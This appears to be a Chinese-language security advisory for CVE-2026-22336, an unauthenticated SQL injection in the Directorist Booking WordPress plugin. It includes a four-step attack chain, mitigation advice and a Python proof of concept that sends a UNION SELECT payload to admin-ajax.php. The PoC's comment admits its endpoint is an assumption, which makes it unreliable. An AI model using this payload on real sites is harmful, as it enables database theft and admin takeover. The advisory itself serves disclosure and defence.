CVE-2026-22336 CVSS 9.3 严重

CVE-2026-22336 Directorist Booking SQL注入漏洞

披露日期: 2026-04-27

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-22336

漏洞类型

SQL注入

CVSS评分

9.3 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Directorist Booking

漏洞概述

Directorist Booking插件存在SQL注入漏洞。该漏洞允许未经身份验证的远程攻击者通过构造恶意SQL语句，从数据库中窃取敏感信息。由于无需用户交互即可利用，该漏洞对系统机密性构成严重威胁。

技术细节

该漏洞是由于Directorist Booking插件在处理用户输入时，未能正确过滤特殊字符，导致攻击者可以将恶意SQL代码注入到后端查询中。根据CVSS向量分析，攻击无需认证（PR:N）且无需用户交互（UI:N），攻击复杂度低（AC:L）。攻击者可通过发送特制的HTTP请求，利用UNION SELECT或基于布尔/时间的盲注技术，获取数据库中的用户凭证、配置信息等敏感数据，并可能导致数据库服务轻微不可用。

攻击链分析

STEP 1

reconnaissance

攻击者使用自动化工具扫描互联网，识别安装了Directorist Booking插件的WordPress网站，并确认其版本低于3.0.2。

STEP 2

漏洞利用

攻击者向插件接口发送特制的HTTP POST请求，请求参数中包含恶意SQL注入代码（如UNION SELECT语句）。

STEP 3

数据提取

后端数据库执行恶意SQL查询，将敏感数据（如管理员用户名和密码哈希）返回给攻击者。

STEP 4

权限提升

攻击者利用泄露的管理员凭证登录WordPress后台，进一步控制网站或服务器。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# PoC for CVE-2026-22336 (Directorist Booking SQL Injection)

import requests

def exploit_sqli(target_url):
    # Vulnerable endpoint assumption based on common WP plugin structures
    url = f"{target_url}/wp-admin/admin-ajax.php"
    
    # Malicious payload to extract database version
    payload = {
        "action": "directorist_booking_data", 
        "id": "1 AND 1=1 UNION ALL SELECT NULL, version(), NULL-- -"
    }
    
    try:
        response = requests.post(url, data=payload, timeout=10)
        if response.status_code == 200:
            print("[+] Request sent successfully.")
            print("[+] Check response for SQL errors or data leakage.")
            print(response.text[:200]) # Print partial response
        else:
            print(f"[-] Server returned status code: {response.status_code}")
    except Exception as e:
        print(f"[-] Error occurred: {e}")

if __name__ == "__main__":
    target = "http://example.com" # Replace with actual target
    exploit_sqli(target)

影响范围

Directorist Booking < 3.0.2

防御指南

临时缓解措施

如果无法立即升级，建议暂时禁用Directorist Booking插件以阻断攻击路径。同时，应配置WAF规则拦截包含特定SQL关键词（如UNION, SELECT, OR, AND）的异常请求流量，并加强对数据库访问日志的监控，及时发现异常查询行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表